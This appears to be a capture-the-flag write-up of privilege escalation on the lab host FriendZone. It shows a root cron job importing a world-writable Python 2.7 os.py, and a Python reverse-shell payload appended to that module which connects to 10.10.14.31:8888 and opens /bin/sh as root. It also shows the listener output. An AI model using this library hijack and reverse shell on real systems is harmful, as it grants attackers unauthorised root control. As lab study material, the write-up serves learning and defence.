7 privesc
pspy
2021/06/07 01:44:01 CMD: UID=0 PID=19787 | /bin/sh -c /opt/server_admin/reporter.py
2021/06/07 01:44:01 CMD: UID=0 PID=19786 | /bin/sh -c /opt/server_admin/reporter.py
2021/06/07 01:44:01 CMD: UID=0 PID=19785 | /usr/sbin/CRON -f
www-data@FriendZone:/opt/server_admin$ cat reporter.py
#!/usr/bin/python
"""Mail reporter stub that root's cron runs (see the pspy lines above).

Review notes:
  * `import os` is resolved through sys.path to /usr/lib/python2.7/os.py,
    which the `ls -la` output shows as world-writable (-rwxrwxrwx, root-owned)
    on this host, so anything appended to that module executes with this
    job's privileges (uid 0) on import. The Python 3.6 copy is 0644.
  * The disabled mailsend line below still contains a credential; secrets
    should not live in source at all, commented out or not.
"""
import os

# Recipient / sender for the (not yet implemented) report mail.
to_address = "admin1@friendzone.com"
from_address = "admin2@friendzone.com"

# Function-call form prints identically under Python 2 for a single argument.
print("[+] Trying to send email to %s" % to_address)

# Original, disabled send command kept for reference.
#command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''
#os.system(command)
# I need to edit the script later
# Sam ~ python developer
www-data@FriendZone:/opt/server_admin$
locate os.py
/usr/lib/python2.7/os.py
/usr/lib/python2.7/os.pyc
/usr/lib/python2.7/dist-packages/samba/provision/kerberos.py
/usr/lib/python2.7/dist-packages/samba/provision/kerberos.pyc
/usr/lib/python2.7/encodings/palmos.py
/usr/lib/python2.7/encodings/palmos.pyc
/usr/lib/python3/dist-packages/LanguageSelector/macros.py
/usr/lib/python3.6/os.py
/usr/lib/python3.6/encodings/palmos.py
ls -la /usr/lib/python2.7/os.py
-rwxrwxrwx 1 root root 25910 Jan 15 2019 /usr/lib/python2.7/os.py
ls -la /usr/lib/python3.6/os.py
-rw-r--r-- 1 root root 37526 Sep 12 2018 /usr/lib/python3.6/os.py
/usr/lib/python2.7/os.py is world-writable (-rwxrwxrwx, root-owned), unlike the Python 3.6 copy, and reporter.py runs under /usr/bin/python (2.7) as root from cron, so we can append our code to that module and it will run as root the next time the script imports os.
# Payload appended to the world-writable /usr/lib/python2.7/os.py (see the
# ls -la output above). Because it lives in a core module it runs on every
# Python 2 `import os` on the host -- the root cron job
# /opt/server_admin/reporter.py included -- so the effect is system-wide,
# not scoped to one script. Detection signal: a CRON -> python child that
# opens an outbound TCP connection and execs /bin/sh -i. The defensive fix
# is the file mode on os.py (0644, as on the 3.6 copy), not the cron job.
import socket,subprocess,os;
# Outbound connection to the listener at 10.10.14.31:8888.
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.10.14.31",8888));
# Attach stdin/stdout/stderr to the socket so the shell below is interactive.
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
# Interactive shell; when triggered by the cron job it runs as uid 0.
p=subprocess.call(["/bin/sh","-i"]);
Wait for cron to run reporter.py again; its `import os` executes the appended code.
$ rlwrap nc -lvnp 8888
listening on [any] 8888 ...
connect to [10.10.14.31] from (UNKNOWN) [10.10.10.123] 59638
whoami;id
root
uid=0(root) gid=0(root) groups=0(root)